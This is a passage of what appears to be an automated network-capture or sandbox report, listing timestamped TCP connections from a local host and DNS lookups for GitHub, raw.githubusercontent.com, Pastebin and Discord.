                                                                      Oct 15, 2024 15:59:27.147423983 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.481204987 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.481363058 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.481481075 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.481534958 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.481555939 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.481607914 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.493486881 CEST49735443192.168.2.4140.82.121.3
                                                                      Oct 15, 2024 15:59:27.493542910 CEST44349735140.82.121.3192.168.2.4
                                                                      Oct 15, 2024 15:59:27.502625942 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:27.502681971 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:27.502760887 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:27.502993107 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:27.503025055 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.111358881 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.111505032 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.116127014 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.116152048 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.116564035 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.116636992 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.116956949 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.159415960 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378253937 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378423929 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378456116 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378505945 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378513098 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378552914 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378559113 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378597975 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378603935 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378643036 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378648996 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378685951 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.378711939 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.378757954 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.379123926 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.379179955 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.379200935 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.379255056 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.379271984 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.379319906 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.494859934 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.494906902 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.494930029 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.494951010 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.494956970 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.494957924 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495026112 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495073080 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495073080 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495073080 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495311022 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495471001 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495776892 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495810032 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495831013 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495851994 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495852947 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495868921 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.495898008 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.495915890 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496304989 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496335030 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496364117 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496382952 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496433973 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496433973 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496871948 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496911049 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496932030 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496949911 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496972084 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.496994019 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.496998072 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.497009993 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.497037888 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.497073889 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.497751951 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.497813940 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.498040915 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.498102903 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.498109102 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.498142958 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.498162985 CEST44349736185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:28.498186111 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.498186111 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:28.498231888 CEST49736443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:32.556874990 CEST4973780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:32.562951088 CEST8049737185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:32.563098907 CEST4973780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:32.567075014 CEST4973780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:32.572308064 CEST8049737185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.161463976 CEST8049737185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.162583113 CEST8049737185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.162678003 CEST4973780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.164560080 CEST4973780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.168668985 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.168720961 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.168804884 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.169589996 CEST8049737185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.189291000 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.189311981 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.793499947 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.793605089 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.797123909 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.797143936 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.797391891 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:33.804722071 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:33.851408005 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.019408941 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.019592047 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.019671917 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:34.019686937 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.019717932 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.019921064 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:34.019934893 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.020311117 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.020390034 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:34.020395041 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.026724100 CEST44349738185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:34.026786089 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:34.059607029 CEST49738443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:51.587723970 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:51.592716932 CEST8049740172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:51.592807055 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:51.594091892 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:51.598906040 CEST8049740172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.218569040 CEST8049740172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.220833063 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.220880032 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.221002102 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.224267960 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.224289894 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.269485950 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.462208986 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:52.462254047 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:52.462352991 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:52.462755919 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:52.462771893 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:52.850522041 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.850593090 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.906348944 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.906372070 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.907443047 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:52.915921926 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:52.963404894 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:53.065481901 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:53.065687895 CEST44349741172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:53.065747976 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:53.078800917 CEST49741443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:53.087169886 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.087363958 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.096556902 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.096591949 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.096872091 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.097835064 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.101108074 CEST4974380192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.106235027 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.106370926 CEST4974380192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.106467962 CEST4974380192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.112478971 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.143407106 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.143485069 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.143513918 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.332061052 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.332314014 CEST44349742162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 15:59:53.332376003 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.340082884 CEST49742443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 15:59:53.728348970 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.728595018 CEST4974380192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.729465008 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.729530096 CEST4974380192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.729772091 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.729832888 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.729976892 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.730252028 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:53.730274916 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:53.733501911 CEST8049743185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.350431919 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.350835085 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.352478981 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.352493048 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.352855921 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.354082108 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.395420074 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704293013 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704463005 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704529047 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704598904 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704602003 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704629898 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704704046 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704713106 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704751968 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.704765081 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704902887 CEST44349744185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 15:59:54.704969883 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:54.782630920 CEST49744443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 15:59:59.514312983 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.900897980 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 15:59:59.900980949 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.908361912 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 15:59:59.913317919 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.529232025 CEST8049745172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.531366110 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.531409979 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.531662941 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.534446955 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:00.534461975 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:00.582048893 CEST4974580192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.156943083 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.157072067 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.158679962 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.158687115 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.159535885 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.166265011 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.211402893 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312302113 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312611103 CEST44349746172.67.19.24192.168.2.4
                                                                      Oct 15, 2024 16:00:01.312707901 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.325257063 CEST49746443192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:01.340539932 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.346590996 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:01.348048925 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.348216057 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:01.354441881 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198314905 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198364019 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198429108 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.198436975 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.198473930 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.198637009 CEST4974780192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.199790955 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.199824095 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.199918985 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.200186968 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.200200081 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.209184885 CEST8049747185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.810569048 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.810664892 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.909914970 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.909946918 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.910934925 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:02.946649075 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:02.991410017 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071736097 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071938038 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.071995974 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072010040 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072102070 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072149992 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072159052 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072242022 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.072288036 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.072293997 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.078412056 CEST44349748185.199.109.133192.168.2.4
                                                                      Oct 15, 2024 16:00:03.078469992 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:03.143800020 CEST49748443192.168.2.4185.199.109.133
                                                                      Oct 15, 2024 16:00:07.621099949 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621149063 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:07.621341944 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621773005 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:07.621787071 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.231175900 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.231409073 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.232790947 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.232805967 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.233053923 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.233906984 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.279407978 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.279481888 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.279505014 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497196913 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497406006 CEST44349749162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:08.497471094 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:08.500015020 CEST49749443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:13.527084112 CEST4974080192.168.2.4172.67.19.24
                                                                      Oct 15, 2024 16:00:15.465471983 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.465519905 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:15.465607882 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.466248989 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:15.466265917 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.082010031 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.082103014 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.083828926 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.083843946 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.084328890 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.091759920 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.139405012 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.139491081 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.139503956 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360263109 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360369921 CEST44349763162.159.138.232192.168.2.4
                                                                      Oct 15, 2024 16:00:16.360501051 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:16.362966061 CEST49763443192.168.2.4162.159.138.232
                                                                      Oct 15, 2024 16:00:21.398005009 CEST4974580192.168.2.4172.67.19.24
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 15, 2024 15:59:26.032682896 CEST5646953192.168.2.41.1.1.1
                                                                      Oct 15, 2024 15:59:26.040072918 CEST53564691.1.1.1192.168.2.4
                                                                      Oct 15, 2024 15:59:27.494472027 CEST5665453192.168.2.41.1.1.1
                                                                      Oct 15, 2024 15:59:27.501832962 CEST53566541.1.1.1192.168.2.4
                                                                      Oct 15, 2024 15:59:32.538417101 CEST5072953192.168.2.41.1.1.1
                                                                      Oct 15, 2024 15:59:32.546056032 CEST53507291.1.1.1192.168.2.4
                                                                      Oct 15, 2024 15:59:51.573410988 CEST6496853192.168.2.41.1.1.1
                                                                      Oct 15, 2024 15:59:51.581504107 CEST53649681.1.1.1192.168.2.4
                                                                      Oct 15, 2024 15:59:52.453298092 CEST6024853192.168.2.41.1.1.1
                                                                      Oct 15, 2024 15:59:52.461483955 CEST53602481.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 15, 2024 15:59:26.032682896 CEST192.168.2.41.1.1.10xb720Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:27.494472027 CEST192.168.2.41.1.1.10xc429Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:32.538417101 CEST192.168.2.41.1.1.10x9092Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:51.573410988 CEST192.168.2.41.1.1.10x30d8Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:52.453298092 CEST192.168.2.41.1.1.10xd6aStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 15, 2024 15:59:26.040072918 CEST1.1.1.1192.168.2.40xb720No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:27.501832962 CEST1.1.1.1192.168.2.40xc429No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:27.501832962 CEST1.1.1.1192.168.2.40xc429No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 15:59:27.501832962 CEST1.1.1.1192.168.2.40xc429No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
